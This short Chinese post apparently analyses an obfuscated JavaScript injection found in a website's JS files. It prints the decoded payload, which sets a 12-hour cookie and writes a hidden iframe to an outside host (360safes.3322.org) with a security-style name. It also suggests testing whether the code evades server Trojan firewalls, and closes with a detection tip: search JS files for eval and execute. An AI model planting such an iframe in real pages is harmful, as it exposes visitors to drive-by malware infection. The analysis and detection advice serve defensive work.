我想, 如果单单看这个代码的话, 很难发现JS文件是被挂了iframe。 现在挂马手段越来越高明, 挂的代码都是经过算法加密的。 让大家不能简单的找出挂马。 估计这样写, 也是为了逃避服务器上安装的一些木马防火墙吧。 不知道有没有人服务器上装过木马防火墙, 可以拿这个代码试一下, 是否能躲避过木马防火墙。
以上加密后的代码最终运行的代码为:
var cookieString=document.cookie;var start=cookieString.indexOf("cookiesleep");if(start!=-1){}else{var expires=new Date();expires.setTime(expires.getTime()+12*60*60*1000);document.cookie="cookiesleep=test;expires="+expires.toGMTString();document.write("<iframe src=http://360safes.3322.org/include/as.asp width=10 height=0></iframe>")}。
这里教大家一个简单的搜索这种马的方法:用editplus中的文件夹搜索, 搜索所有js文件, 搜索关键字为:eval和execute, 然后一个个去看, 一般都能找出这种JS木马的。
……